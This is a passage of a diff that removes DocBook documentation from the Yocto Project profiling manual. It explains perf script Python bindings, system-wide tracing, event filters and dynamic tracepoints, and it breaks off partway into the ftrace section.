-                the fact that conceptually, most of it has been thrown away.
-            </para>
-
-            <para>
-                Full-blown detailed tracing data does however offer the opportunity
-                to manipulate and present the information collected during a
-                tracing run in an infinite variety of ways.
-            </para>
-
-            <para>
-                Another way to look at it is that there are only so many ways that
-                the 'primitive' counters can be used on their own to generate
-                interesting output; to get anything more complicated than simple
-                counts requires some amount of additional logic, which is typically
-                very specific to the problem at hand. For example, if we wanted to
-                make use of a 'counter' that maps to the value of the time
-                difference between when a process was scheduled to run on a
-                processor and the time it actually ran, we wouldn't expect such
-                a counter to exist on its own, but we could derive one called say
-                'wakeup_latency' and use it to extract a useful view of that metric
-                from trace data. Likewise, we really can't figure out from standard
-                profiling tools how much data every process on the system reads and
-                writes, along with how many of those reads and writes fail
-                completely. If we have sufficient trace data, however, we could
-                with the right tools easily extract and present that information,
-                but we'd need something other than pre-canned profiling tools to
-                do that.
-            </para>
-
-            <para>
-                Luckily, there is a general-purpose way to handle such needs,
-                called 'programming languages'. Making programming languages
-                easily available to apply to such problems given the specific
-                format of data is called a 'programming language binding' for
-                that data and language. Perf supports two programming language
-                bindings, one for Python and one for Perl.
-            </para>
-
-            <informalexample>
-                <emphasis>Tying it Together:</emphasis> Language bindings for manipulating and
-                aggregating trace data are of course not a new
-                idea.  One of the first projects to do this was IBM's DProbes
-                dpcc compiler, an ANSI C compiler which targeted a low-level
-                assembly language running on an in-kernel interpreter on the
-                target system.  This is exactly analogous to what Sun's DTrace
-                did, except that DTrace invented its own language for the purpose.
-                Systemtap, heavily inspired by DTrace, also created its own
-                one-off language, but rather than running the product on an
-                in-kernel interpreter, created an elaborate compiler-based
-                machinery to translate its language into kernel modules written
-                in C.
-            </informalexample>
-
-            <para>
-                Now that we have the trace data in perf.data, we can use
-                'perf script -g' to generate a skeleton script with handlers
-                for the read/write entry/exit events we recorded:
-                <literallayout class='monospaced'>
-     root@crownbay:~# perf script -g python
-     generated Python script: perf-script.py
-                </literallayout>
-                The skeleton script simply creates a python function for each
-                event type in the perf.data file. The body of each function simply
-                prints the event name along with its parameters. For example:
-                <literallayout class='monospaced'>
-     def net__netif_rx(event_name, context, common_cpu,
-            common_secs, common_nsecs, common_pid, common_comm,
-            skbaddr, len, name):
-                    print_header(event_name, common_cpu, common_secs, common_nsecs,
-                            common_pid, common_comm)
-
-		     print "skbaddr=%u, len=%u, name=%s\n" % (skbaddr, len, name),
-                </literallayout>
-                We can run that script directly to print all of the events
-                contained in the perf.data file:
-                <literallayout class='monospaced'>
-     root@crownbay:~# perf script -s perf-script.py
-
-     in trace_begin
-     syscalls__sys_exit_read     0 11624.857082795     1262 perf                  nr=3, ret=0
-     sched__sched_wakeup      0 11624.857193498     1262 perf                  comm=migration/0, pid=6, prio=0,      success=1, target_cpu=0
-     irq__softirq_raise       1 11624.858021635     1262 wget                  vec=TIMER
-     irq__softirq_entry       1 11624.858074075     1262 wget                  vec=TIMER
-     irq__softirq_exit        1 11624.858081389     1262 wget                  vec=TIMER
-     syscalls__sys_enter_read     1 11624.858166434     1262 wget                  nr=3, fd=3, buf=3213019456,      count=512
-     syscalls__sys_exit_read     1 11624.858177924     1262 wget                  nr=3, ret=512
-     skb__kfree_skb           1 11624.858878188     1262 wget                  skbaddr=3945041280,           location=3243922184, protocol=0
-     skb__kfree_skb           1 11624.858945608     1262 wget                  skbaddr=3945037824,      location=3243922184, protocol=0
-     irq__softirq_raise       1 11624.859020942     1262 wget                  vec=TIMER
-     irq__softirq_entry       1 11624.859076935     1262 wget                  vec=TIMER
-     irq__softirq_exit        1 11624.859083469     1262 wget                  vec=TIMER
-     syscalls__sys_enter_read     1 11624.859167565     1262 wget                  nr=3, fd=3, buf=3077701632,      count=1024
-     syscalls__sys_exit_read     1 11624.859192533     1262 wget                  nr=3, ret=471
-     syscalls__sys_enter_read     1 11624.859228072     1262 wget                  nr=3, fd=3, buf=3077701632,      count=1024
-     syscalls__sys_exit_read     1 11624.859233707     1262 wget                  nr=3, ret=0
-     syscalls__sys_enter_read     1 11624.859573008     1262 wget                  nr=3, fd=3, buf=3213018496,      count=512
-     syscalls__sys_exit_read     1 11624.859584818     1262 wget                  nr=3, ret=512
-     syscalls__sys_enter_read     1 11624.859864562     1262 wget                  nr=3, fd=3, buf=3077701632,      count=1024
-     syscalls__sys_exit_read     1 11624.859888770     1262 wget                  nr=3, ret=1024
-     syscalls__sys_enter_read     1 11624.859935140     1262 wget                  nr=3, fd=3, buf=3077701632,      count=1024
-     syscalls__sys_exit_read     1 11624.859944032     1262 wget                  nr=3, ret=1024
-                </literallayout>
-                That in itself isn't very useful; after all, we can accomplish
-                pretty much the same thing by simply running 'perf script'
-                without arguments in the same directory as the perf.data file.
-            </para>
-
-            <para>
-                We can however replace the print statements in the generated
-                function bodies with whatever we want, and thereby make it
-                infinitely more useful.
-            </para>
-
-            <para>
-                As a simple example, let's just replace the print statements in
-                the function bodies with a simple function that does nothing but
-                increment a per-event count. When the program is run against a
-                perf.data file, each time a particular event is encountered,
-                a tally is incremented for that event. For example:
-                <literallayout class='monospaced'>
-     def net__netif_rx(event_name, context, common_cpu,
-            common_secs, common_nsecs, common_pid, common_comm,
-            skbaddr, len, name):
-		          inc_counts(event_name)
-                </literallayout>
-                Each event handler function in the generated code is modified
-                to do this. For convenience, we define a common function called
-                inc_counts() that each handler calls; inc_counts() simply tallies
-                a count for each event using the 'counts' hash, which is a
-                specialized hash function that does Perl-like autovivification, a
-                capability that's extremely useful for kinds of multi-level
-                aggregation commonly used in processing traces (see perf's
-                documentation on the Python language binding for details):
-                <literallayout class='monospaced'>
-     counts = autodict()
-
-     def inc_counts(event_name):
-            try:
-                    counts[event_name] += 1
-            except TypeError:
-                    counts[event_name] = 1
-                </literallayout>
-                Finally, at the end of the trace processing run, we want to
-                print the result of all the per-event tallies. For that, we
-                use the special 'trace_end()' function:
-                <literallayout class='monospaced'>
-     def trace_end():
-            for event_name, count in counts.iteritems():
-                    print "%-40s %10s\n" % (event_name, count)
-                </literallayout>
-                The end result is a summary of all the events recorded in the
-                trace:
-                <literallayout class='monospaced'>
-     skb__skb_copy_datagram_iovec                  13148
-     irq__softirq_entry                             4796
-     irq__irq_handler_exit                          3805
-     irq__softirq_exit                              4795
-     syscalls__sys_enter_write                      8990
-     net__net_dev_xmit                               652
-     skb__kfree_skb                                 4047
-     sched__sched_wakeup                            1155
-     irq__irq_handler_entry                         3804
-     irq__softirq_raise                             4799
-     net__net_dev_queue                              652
-     syscalls__sys_enter_read                      17599
-     net__netif_receive_skb                         1743
-     syscalls__sys_exit_read                       17598
-     net__netif_rx                                     2
-     napi__napi_poll                                1877
-     syscalls__sys_exit_write                       8990
-                </literallayout>
-                Note that this is pretty much exactly the same information we get
-                from 'perf stat', which goes a little way to support the idea
-                mentioned previously that given the right kind of trace data,
-                higher-level profiling-type summaries can be derived from it.
-            </para>
-
-            <para>
-                Documentation on using the
-                <ulink url='http://linux.die.net/man/1/perf-script-python'>'perf script' python binding</ulink>.
-            </para>
-        </section>
-
-        <section id='system-wide-tracing-and-profiling'>
-            <title>System-Wide Tracing and Profiling</title>
-
-            <para>
-                The examples so far have focused on tracing a particular program or
-                workload - in other words, every profiling run has specified the
-                program to profile in the command-line e.g. 'perf record wget ...'.
-            </para>
-
-            <para>
-                It's also possible, and more interesting in many cases, to run a
-                system-wide profile or trace while running the workload in a
-                separate shell.
-            </para>
-
-            <para>
-                To do system-wide profiling or tracing, you typically use
-                the -a flag to 'perf record'.
-            </para>
-
-            <para>
-                To demonstrate this, open up one window and start the profile
-                using the -a flag (press Ctrl-C to stop tracing):
-                <literallayout class='monospaced'>
-     root@crownbay:~# perf record -g -a
-     ^C[ perf record: Woken up 6 times to write data ]
-     [ perf record: Captured and wrote 1.400 MB perf.data (~61172 samples) ]
-                </literallayout>
-                In another window, run the wget test:
-                <literallayout class='monospaced'>
-     root@crownbay:~# wget <ulink url='http://downloads.yoctoproject.org/mirror/sources/linux-2.6.19.2.tar.bz2'>http://downloads.yoctoproject.org/mirror/sources/linux-2.6.19.2.tar.bz2</ulink>
-     Connecting to downloads.yoctoproject.org (140.211.169.59:80)
-     linux-2.6.19.2.tar.b 100% |*******************************| 41727k  0:00:00 ETA
-                </literallayout>
-                Here we see entries not only for our wget load, but for other
-                processes running on the system as well:
-            </para>
-
-            <para>
-                <imagedata fileref="figures/perf-systemwide.png" width="6in" depth="7in" align="center" scalefit="1" />
-            </para>
-
-            <para>
-                In the snapshot above, we can see callchains that originate in
-                libc, and a callchain from Xorg that demonstrates that we're
-                using a proprietary X driver in userspace (notice the presence
-                of 'PVR' and some other unresolvable symbols in the expanded
-                Xorg callchain).
-            </para>
-
-            <para>
-                Note also that we have both kernel and userspace entries in the
-                above snapshot. We can also tell perf to focus on userspace but
-                providing a modifier, in this case 'u', to the 'cycles' hardware
-                counter when we record a profile:
-                <literallayout class='monospaced'>
-     root@crownbay:~# perf record -g -a -e cycles:u
-     ^C[ perf record: Woken up 2 times to write data ]
-     [ perf record: Captured and wrote 0.376 MB perf.data (~16443 samples) ]
-                </literallayout>
-            </para>
-
-            <para>
-                <imagedata fileref="figures/perf-report-cycles-u.png" width="6in" depth="7in" align="center" scalefit="1" />
-            </para>
-
-            <para>
-                Notice in the screenshot above, we see only userspace entries ([.])
-            </para>
-
-            <para>
-                Finally, we can press 'enter' on a leaf node and select the 'Zoom
-                into DSO' menu item to show only entries associated with a
-                specific DSO. In the screenshot below, we've zoomed into the
-                'libc' DSO which shows all the entries associated with the
-                libc-xxx.so DSO.
-            </para>
-
-            <para>
-                <imagedata fileref="figures/perf-systemwide-libc.png" width="6in" depth="7in" align="center" scalefit="1" />
-            </para>
-
-            <para>
-                We can also use the system-wide -a switch to do system-wide
-                tracing. Here we'll trace a couple of scheduler events:
-                <literallayout class='monospaced'>
-     root@crownbay:~# perf record -a -e sched:sched_switch -e sched:sched_wakeup
-     ^C[ perf record: Woken up 38 times to write data ]
-     [ perf record: Captured and wrote 9.780 MB perf.data (~427299 samples) ]
-                </literallayout>
-                We can look at the raw output using 'perf script' with no
-                arguments:
-                <literallayout class='monospaced'>
-     root@crownbay:~# perf script
-
-                perf  1383 [001]  6171.460045: sched_wakeup: comm=kworker/1:1 pid=21 prio=120 success=1 target_cpu=001
-                perf  1383 [001]  6171.460066: sched_switch: prev_comm=perf prev_pid=1383 prev_prio=120 prev_state=R+ ==> next_comm=kworker/1:1 next_pid=21 next_prio=120
-         kworker/1:1    21 [001]  6171.460093: sched_switch: prev_comm=kworker/1:1 prev_pid=21 prev_prio=120 prev_state=S ==> next_comm=perf next_pid=1383 next_prio=120
-             swapper     0 [000]  6171.468063: sched_wakeup: comm=kworker/0:3 pid=1209 prio=120 success=1 target_cpu=000
-             swapper     0 [000]  6171.468107: sched_switch: prev_comm=swapper/0 prev_pid=0 prev_prio=120 prev_state=R ==> next_comm=kworker/0:3 next_pid=1209 next_prio=120
-         kworker/0:3  1209 [000]  6171.468143: sched_switch: prev_comm=kworker/0:3 prev_pid=1209 prev_prio=120 prev_state=S ==> next_comm=swapper/0 next_pid=0 next_prio=120
-                perf  1383 [001]  6171.470039: sched_wakeup: comm=kworker/1:1 pid=21 prio=120 success=1 target_cpu=001
-                perf  1383 [001]  6171.470058: sched_switch: prev_comm=perf prev_pid=1383 prev_prio=120 prev_state=R+ ==> next_comm=kworker/1:1 next_pid=21 next_prio=120
-         kworker/1:1    21 [001]  6171.470082: sched_switch: prev_comm=kworker/1:1 prev_pid=21 prev_prio=120 prev_state=S ==> next_comm=perf next_pid=1383 next_prio=120
-                perf  1383 [001]  6171.480035: sched_wakeup: comm=kworker/1:1 pid=21 prio=120 success=1 target_cpu=001
-                </literallayout>
-            </para>
-
-            <section id='perf-filtering'>
-                <title>Filtering</title>
-
-                <para>
-                    Notice that there are a lot of events that don't really have
-                    anything to do with what we're interested in, namely events
-                    that schedule 'perf' itself in and out or that wake perf up.
-                    We can get rid of those by using the '--filter' option -
-                    for each event we specify using -e, we can add a --filter
-                    after that to filter out trace events that contain fields
-                    with specific values:
-                    <literallayout class='monospaced'>
-     root@crownbay:~# perf record -a -e sched:sched_switch --filter 'next_comm != perf &amp;&amp; prev_comm != perf' -e sched:sched_wakeup --filter 'comm != perf'
-     ^C[ perf record: Woken up 38 times to write data ]
-     [ perf record: Captured and wrote 9.688 MB perf.data (~423279 samples) ]
-
-
-     root@crownbay:~# perf script
-
-             swapper     0 [000]  7932.162180: sched_switch: prev_comm=swapper/0 prev_pid=0 prev_prio=120 prev_state=R ==> next_comm=kworker/0:3 next_pid=1209 next_prio=120
-         kworker/0:3  1209 [000]  7932.162236: sched_switch: prev_comm=kworker/0:3 prev_pid=1209 prev_prio=120 prev_state=S ==> next_comm=swapper/0 next_pid=0 next_prio=120
-                perf  1407 [001]  7932.170048: sched_wakeup: comm=kworker/1:1 pid=21 prio=120 success=1 target_cpu=001
-                perf  1407 [001]  7932.180044: sched_wakeup: comm=kworker/1:1 pid=21 prio=120 success=1 target_cpu=001
-                perf  1407 [001]  7932.190038: sched_wakeup: comm=kworker/1:1 pid=21 prio=120 success=1 target_cpu=001
-                perf  1407 [001]  7932.200044: sched_wakeup: comm=kworker/1:1 pid=21 prio=120 success=1 target_cpu=001
-                perf  1407 [001]  7932.210044: sched_wakeup: comm=kworker/1:1 pid=21 prio=120 success=1 target_cpu=001
-                perf  1407 [001]  7932.220044: sched_wakeup: comm=kworker/1:1 pid=21 prio=120 success=1 target_cpu=001
-             swapper     0 [001]  7932.230111: sched_wakeup: comm=kworker/1:1 pid=21 prio=120 success=1 target_cpu=001
-             swapper     0 [001]  7932.230146: sched_switch: prev_comm=swapper/1 prev_pid=0 prev_prio=120 prev_state=R ==> next_comm=kworker/1:1 next_pid=21 next_prio=120
-         kworker/1:1    21 [001]  7932.230205: sched_switch: prev_comm=kworker/1:1 prev_pid=21 prev_prio=120 prev_state=S ==> next_comm=swapper/1 next_pid=0 next_prio=120
-             swapper     0 [000]  7932.326109: sched_wakeup: comm=kworker/0:3 pid=1209 prio=120 success=1 target_cpu=000
-             swapper     0 [000]  7932.326171: sched_switch: prev_comm=swapper/0 prev_pid=0 prev_prio=120 prev_state=R ==> next_comm=kworker/0:3 next_pid=1209 next_prio=120
-         kworker/0:3  1209 [000]  7932.326214: sched_switch: prev_comm=kworker/0:3 prev_pid=1209 prev_prio=120 prev_state=S ==> next_comm=swapper/0 next_pid=0 next_prio=120
-                    </literallayout>
-                    In this case, we've filtered out all events that have 'perf'
-                    in their 'comm' or 'comm_prev' or 'comm_next' fields. Notice
-                    that there are still events recorded for perf, but notice
-                    that those events don't have values of 'perf' for the filtered
-                    fields. To completely filter out anything from perf will
-                    require a bit more work, but for the purpose of demonstrating
-                    how to use filters, it's close enough.
-                </para>
-
-                <informalexample>
-                    <emphasis>Tying it Together:</emphasis> These are exactly the same set of event
-                    filters defined by the trace event subsystem. See the
-                    ftrace/tracecmd/kernelshark section for more discussion about
-                    these event filters.
-                </informalexample>
-
-                <informalexample>
-                    <emphasis>Tying it Together:</emphasis> These event filters are implemented by a
-                    special-purpose pseudo-interpreter in the kernel and are an
-                    integral and indispensable part of the perf design as it
-                    relates to tracing.  kernel-based event filters provide a
-                    mechanism to precisely throttle the event stream that appears
-                    in user space, where it makes sense to provide bindings to real
-                    programming languages for postprocessing the event stream.
-                    This architecture allows for the intelligent and flexible
-                    partitioning of processing between the kernel and user space.
-                    Contrast this with other tools such as SystemTap, which does
-                    all of its processing in the kernel and as such requires a
-                    special project-defined language in order to accommodate that
-                    design, or LTTng, where everything is sent to userspace and
-                    as such requires a super-efficient kernel-to-userspace
-                    transport mechanism in order to function properly.  While
-                    perf certainly can benefit from for instance advances in
-                    the design of the transport, it doesn't fundamentally depend
-                    on them.  Basically, if you find that your perf tracing
-                    application is causing buffer I/O overruns, it probably
-                    means that you aren't taking enough advantage of the
-                    kernel filtering engine.
-                </informalexample>
-            </section>
-        </section>
-
-        <section id='using-dynamic-tracepoints'>
-            <title>Using Dynamic Tracepoints</title>
-
-            <para>
-                perf isn't restricted to the fixed set of static tracepoints
-                listed by 'perf list'. Users can also add their own 'dynamic'
-                tracepoints anywhere in the kernel. For instance, suppose we
-                want to define our own tracepoint on do_fork(). We can do that
-                using the 'perf probe' perf subcommand:
-                <literallayout class='monospaced'>
-     root@crownbay:~# perf probe do_fork
-     Added new event:
-       probe:do_fork        (on do_fork)
-
-     You can now use it in all perf tools, such as:
-
-	     perf record -e probe:do_fork -aR sleep 1
-                </literallayout>
-                Adding a new tracepoint via 'perf probe' results in an event
-                with all the expected files and format in
-                /sys/kernel/debug/tracing/events, just the same as for static
-                tracepoints (as discussed in more detail in the trace events
-                subsystem section:
-                <literallayout class='monospaced'>
-     root@crownbay:/sys/kernel/debug/tracing/events/probe/do_fork# ls -al
-     drwxr-xr-x    2 root     root             0 Oct 28 11:42 .
-     drwxr-xr-x    3 root     root             0 Oct 28 11:42 ..
-     -rw-r--r--    1 root     root             0 Oct 28 11:42 enable
-     -rw-r--r--    1 root     root             0 Oct 28 11:42 filter
-     -r--r--r--    1 root     root             0 Oct 28 11:42 format
-     -r--r--r--    1 root     root             0 Oct 28 11:42 id
-
-     root@crownbay:/sys/kernel/debug/tracing/events/probe/do_fork# cat format
-     name: do_fork
-     ID: 944
-     format:
-	     field:unsigned short common_type;	offset:0;	size:2;	signed:0;
-	     field:unsigned char common_flags;	offset:2;	size:1;	signed:0;
-	     field:unsigned char common_preempt_count;	offset:3;	size:1;	signed:0;
-	     field:int common_pid;	offset:4;	size:4;	signed:1;
-	     field:int common_padding;	offset:8;	size:4;	signed:1;
-
-	     field:unsigned long __probe_ip;	offset:12;	size:4;	signed:0;
-
-     print fmt: "(%lx)", REC->__probe_ip
-                </literallayout>
-                We can list all dynamic tracepoints currently in existence:
-                <literallayout class='monospaced'>
-     root@crownbay:~# perf probe -l
-      probe:do_fork        (on do_fork)
-      probe:schedule       (on schedule)
-                </literallayout>
-                Let's record system-wide ('sleep 30' is a trick for recording
-                system-wide but basically do nothing and then wake up after
-                30 seconds):
-                <literallayout class='monospaced'>
-     root@crownbay:~# perf record -g -a -e probe:do_fork sleep 30
-     [ perf record: Woken up 1 times to write data ]
-     [ perf record: Captured and wrote 0.087 MB perf.data (~3812 samples) ]
-                </literallayout>
-                Using 'perf script' we can see each do_fork event that fired:
-                <literallayout class='monospaced'>
-     root@crownbay:~# perf script
-
-     # ========
-     # captured on: Sun Oct 28 11:55:18 2012
-     # hostname : crownbay
-     # os release : 3.4.11-yocto-standard
-     # perf version : 3.4.11
-     # arch : i686
-     # nrcpus online : 2
-     # nrcpus avail : 2
-     # cpudesc : Intel(R) Atom(TM) CPU E660 @ 1.30GHz
-     # cpuid : GenuineIntel,6,38,1
-     # total memory : 1017184 kB
-     # cmdline : /usr/bin/perf record -g -a -e probe:do_fork sleep 30
-     # event : name = probe:do_fork, type = 2, config = 0x3b0, config1 = 0x0, config2 = 0x0, excl_usr = 0, excl_kern
-      = 0, id = { 5, 6 }
-     # HEADER_CPU_TOPOLOGY info available, use -I to display
-     # ========
-     #
-      matchbox-deskto  1197 [001] 34211.378318: do_fork: (c1028460)
-      matchbox-deskto  1295 [001] 34211.380388: do_fork: (c1028460)
-              pcmanfm  1296 [000] 34211.632350: do_fork: (c1028460)
-              pcmanfm  1296 [000] 34211.639917: do_fork: (c1028460)
-      matchbox-deskto  1197 [001] 34217.541603: do_fork: (c1028460)
-      matchbox-deskto  1299 [001] 34217.543584: do_fork: (c1028460)
-               gthumb  1300 [001] 34217.697451: do_fork: (c1028460)
-               gthumb  1300 [001] 34219.085734: do_fork: (c1028460)
-               gthumb  1300 [000] 34219.121351: do_fork: (c1028460)
-               gthumb  1300 [001] 34219.264551: do_fork: (c1028460)
-              pcmanfm  1296 [000] 34219.590380: do_fork: (c1028460)
-      matchbox-deskto  1197 [001] 34224.955965: do_fork: (c1028460)
-      matchbox-deskto  1306 [001] 34224.957972: do_fork: (c1028460)
-      matchbox-termin  1307 [000] 34225.038214: do_fork: (c1028460)
-      matchbox-termin  1307 [001] 34225.044218: do_fork: (c1028460)
-      matchbox-termin  1307 [000] 34225.046442: do_fork: (c1028460)
-      matchbox-deskto  1197 [001] 34237.112138: do_fork: (c1028460)
-      matchbox-deskto  1311 [001] 34237.114106: do_fork: (c1028460)
-                 gaku  1312 [000] 34237.202388: do_fork: (c1028460)
-                </literallayout>
-                And using 'perf report' on the same file, we can see the
-                callgraphs from starting a few programs during those 30 seconds:
-            </para>
-
-            <para>
-                <imagedata fileref="figures/perf-probe-do_fork-profile.png" width="6in" depth="7in" align="center" scalefit="1" />
-            </para>
-
-            <informalexample>
-                <emphasis>Tying it Together:</emphasis> The trace events subsystem accommodate static
-                and dynamic tracepoints in exactly the same way - there's no
-                difference as far as the infrastructure is concerned.  See the
-                ftrace section for more details on the trace event subsystem.
-            </informalexample>
-
-            <informalexample>
-                <emphasis>Tying it Together:</emphasis> Dynamic tracepoints are implemented under the
-                covers by kprobes and uprobes.  kprobes and uprobes are also used
-                by and in fact are the main focus of SystemTap.
-            </informalexample>
-        </section>
-    </section>
-
-    <section id='perf-documentation'>
-        <title>Documentation</title>
-
-        <para>
-            Online versions of the man pages for the commands discussed in this
-            section can be found here:
-            <itemizedlist>
-                <listitem><para>The <ulink url='http://linux.die.net/man/1/perf-stat'>'perf stat' manpage</ulink>.
-                    </para></listitem>
-                <listitem><para>The <ulink url='http://linux.die.net/man/1/perf-record'>'perf record' manpage</ulink>.
-                    </para></listitem>
-                <listitem><para>The <ulink url='http://linux.die.net/man/1/perf-report'>'perf report' manpage</ulink>.
-                    </para></listitem>
-                <listitem><para>The <ulink url='http://linux.die.net/man/1/perf-probe'>'perf probe' manpage</ulink>.
-                    </para></listitem>
-                <listitem><para>The <ulink url='http://linux.die.net/man/1/perf-script'>'perf script' manpage</ulink>.
-                    </para></listitem>
-                <listitem><para>Documentation on using the
-                    <ulink url='http://linux.die.net/man/1/perf-script-python'>'perf script' python binding</ulink>.
-                    </para></listitem>
-                <listitem><para>The top-level
-                    <ulink url='http://linux.die.net/man/1/perf'>perf(1) manpage</ulink>.
-                    </para></listitem>
-            </itemizedlist>
-        </para>
-
-        <para>
-            Normally, you should be able to invoke the man pages via perf
-            itself e.g. 'perf help' or 'perf help record'.
-        </para>
-
-        <para>
-            However, by default Yocto doesn't install man pages, but perf
-            invokes the man pages for most help functionality. This is a bug
-            and is being addressed by a Yocto bug:
-            <ulink url='https://bugzilla.yoctoproject.org/show_bug.cgi?id=3388'>Bug 3388 - perf: enable man pages for basic 'help' functionality</ulink>.
-        </para>
-
-        <para>
-            The man pages in text form, along with some other files, such as
-            a set of examples, can be found in the 'perf' directory of the
-            kernel tree:
-            <literallayout class='monospaced'>
-     tools/perf/Documentation
-            </literallayout>
-            There's also a nice perf tutorial on the perf wiki that goes
-            into more detail than we do here in certain areas:
-            <ulink url='https://perf.wiki.kernel.org/index.php/Tutorial'>Perf Tutorial</ulink>
-        </para>
-    </section>
-</section>
-
-<section id='profile-manual-ftrace'>
-    <title>ftrace</title>
-
-    <para>
-        'ftrace' literally refers to the 'ftrace function tracer' but in
-        reality this encompasses a number of related tracers along with
-        the infrastructure that they all make use of.
-    </para>
-
-    <section id='ftrace-setup'>
-        <title>Setup</title>
-
-        <para>
-            For this section, we'll assume you've already performed the basic
-            setup outlined in the General Setup section.
-        </para>
-
-        <para>
-            ftrace, trace-cmd, and kernelshark run on the target system,
-            and are ready to go out-of-the-box - no additional setup is
-            necessary. For the rest of this section we assume you've ssh'ed
-            to the host and will be running ftrace on the target. kernelshark
-            is a GUI application and if you use the '-X' option to ssh you
-            can have the kernelshark GUI run on the target but display
-            remotely on the host if you want.
-        </para>
-    </section>
-
-    <section id='basic-ftrace-usage'>
-        <title>Basic ftrace usage</title>
-
-        <para>
-            'ftrace' essentially refers to everything included in
-            the /tracing directory of the mounted debugfs filesystem
-            (Yocto follows the standard convention and mounts it
-            at /sys/kernel/debug). Here's a listing of all the files
-            found in /sys/kernel/debug/tracing on a Yocto system:
-            <literallayout class='monospaced'>
-     root@sugarbay:/sys/kernel/debug/tracing# ls
-     README                      kprobe_events               trace
-     available_events            kprobe_profile              trace_clock
-     available_filter_functions  options                     trace_marker
-     available_tracers           per_cpu                     trace_options
-     buffer_size_kb              printk_formats              trace_pipe
-     buffer_total_size_kb        saved_cmdlines              tracing_cpumask
-     current_tracer              set_event                   tracing_enabled
-     dyn_ftrace_total_info       set_ftrace_filter           tracing_on
-     enabled_functions           set_ftrace_notrace          tracing_thresh
-     events                      set_ftrace_pid
-     free_buffer                 set_graph_function
-            </literallayout>
-            The files listed above are used for various purposes -
-            some relate directly to the tracers themselves, others are
-            used to set tracing options, and yet others actually contain
-            the tracing output when a tracer is in effect. Some of the
-            functions can be guessed from their names, others need
-            explanation; in any case, we'll cover some of the files we
-            see here below but for an explanation of the others, please
-            see the ftrace documentation.
-        </para>
-
-        <para>
-            We'll start by looking at some of the available built-in
-            tracers.
-        </para>
-
-        <para>
-            cat'ing the 'available_tracers' file lists the set of
-            available tracers:
-            <literallayout class='monospaced'>
-     root@sugarbay:/sys/kernel/debug/tracing# cat available_tracers
-     blk function_graph function nop
-            </literallayout>
-            The 'current_tracer' file contains the tracer currently in
-            effect:
-            <literallayout class='monospaced'>
-     root@sugarbay:/sys/kernel/debug/tracing# cat current_tracer
-     nop
-            </literallayout>
-            The above listing of current_tracer shows that
-            the 'nop' tracer is in effect, which is just another
-            way of saying that there's actually no tracer
-            currently in effect.
-        </para>
-
-        <para>
-            echo'ing one of the available_tracers into current_tracer
-            makes the specified tracer the current tracer:
-            <literallayout class='monospaced'>
-     root@sugarbay:/sys/kernel/debug/tracing# echo function > current_tracer
-     root@sugarbay:/sys/kernel/debug/tracing# cat current_tracer
-     function
-            </literallayout>
-            The above sets the current tracer to be the
-            'function tracer'. This tracer traces every function
-            call in the kernel and makes it available as the
-            contents of the 'trace' file. Reading the 'trace' file
-            lists the currently buffered function calls that have been
-            traced by the function tracer:
-            <literallayout class='monospaced'>
-     root@sugarbay:/sys/kernel/debug/tracing# cat trace | less
-
-     # tracer: function
-     #
-     # entries-in-buffer/entries-written: 310629/766471   #P:8
-     #
-     #                              _-----=&gt; irqs-off
-     #                             / _----=&gt; need-resched
-     #                            | / _---=&gt; hardirq/softirq
-     #                            || / _--=&gt; preempt-depth
-     #                            ||| /     delay
-     #           TASK-PID   CPU#  ||||    TIMESTAMP  FUNCTION
-     #              | |       |   ||||       |         |
-              &lt;idle&gt;-0     [004] d..1   470.867169: ktime_get_real &lt;-intel_idle
-              &lt;idle&gt;-0     [004] d..1   470.867170: getnstimeofday &lt;-ktime_get_real
-              &lt;idle&gt;-0     [004] d..1   470.867171: ns_to_timeval &lt;-intel_idle
-              &lt;idle&gt;-0     [004] d..1   470.867171: ns_to_timespec &lt;-ns_to_timeval
-              &lt;idle&gt;-0     [004] d..1   470.867172: smp_apic_timer_interrupt &lt;-apic_timer_interrupt
-              &lt;idle&gt;-0     [004] d..1   470.867172: native_apic_mem_write &lt;-smp_apic_timer_interrupt
-              &lt;idle&gt;-0     [004] d..1   470.867172: irq_enter &lt;-smp_apic_timer_interrupt
-              &lt;idle&gt;-0     [004] d..1   470.867172: rcu_irq_enter &lt;-irq_enter
-              &lt;idle&gt;-0     [004] d..1   470.867173: rcu_idle_exit_common.isra.33 &lt;-rcu_irq_enter
-              &lt;idle&gt;-0     [004] d..1   470.867173: local_bh_disable &lt;-irq_enter
-              &lt;idle&gt;-0     [004] d..1   470.867173: add_preempt_count &lt;-local_bh_disable
-              &lt;idle&gt;-0     [004] d.s1   470.867174: tick_check_idle &lt;-irq_enter
-              &lt;idle&gt;-0     [004] d.s1   470.867174: tick_check_oneshot_broadcast &lt;-tick_check_idle
-              &lt;idle&gt;-0     [004] d.s1   470.867174: ktime_get &lt;-tick_check_idle
-              &lt;idle&gt;-0     [004] d.s1   470.867174: tick_nohz_stop_idle &lt;-tick_check_idle
-              &lt;idle&gt;-0     [004] d.s1   470.867175: update_ts_time_stats &lt;-tick_nohz_stop_idle
-              &lt;idle&gt;-0     [004] d.s1   470.867175: nr_iowait_cpu &lt;-update_ts_time_stats
-              &lt;idle&gt;-0     [004] d.s1   470.867175: tick_do_update_jiffies64 &lt;-tick_check_idle
-              &lt;idle&gt;-0     [004] d.s1   470.867175: _raw_spin_lock &lt;-tick_do_update_jiffies64
-              &lt;idle&gt;-0     [004] d.s1   470.867176: add_preempt_count &lt;-_raw_spin_lock
-              &lt;idle&gt;-0     [004] d.s2   470.867176: do_timer &lt;-tick_do_update_jiffies64
-              &lt;idle&gt;-0     [004] d.s2   470.867176: _raw_spin_lock &lt;-do_timer
-              &lt;idle&gt;-0     [004] d.s2   470.867176: add_preempt_count &lt;-_raw_spin_lock
-              &lt;idle&gt;-0     [004] d.s3   470.867177: ntp_tick_length &lt;-do_timer
-              &lt;idle&gt;-0     [004] d.s3   470.867177: _raw_spin_lock_irqsave &lt;-ntp_tick_length
-              .
-              .
-              .
-            </literallayout>
-            Each line in the trace above shows what was happening in
-            the kernel on a given cpu, to the level of detail of
-            function calls. Each entry shows the function called,
-            followed by its caller (after the arrow).
-        </para>
-
-        <para>
-            The function tracer gives you an extremely detailed idea
-            of what the kernel was doing at the point in time the trace
-            was taken, and is a great way to learn about how the kernel
-            code works in a dynamic sense.
-        </para>
-
-        <informalexample>
-            <emphasis>Tying it Together:</emphasis> The ftrace function tracer is also
-            available from within perf, as the ftrace:function tracepoint.
-        </informalexample>
-
-        <para>
-            It is a little more difficult to follow the call chains than
-            it needs to be - luckily there's a variant of the function
-            tracer that displays the callchains explicitly, called the
-            'function_graph' tracer:
-            <literallayout class='monospaced'>
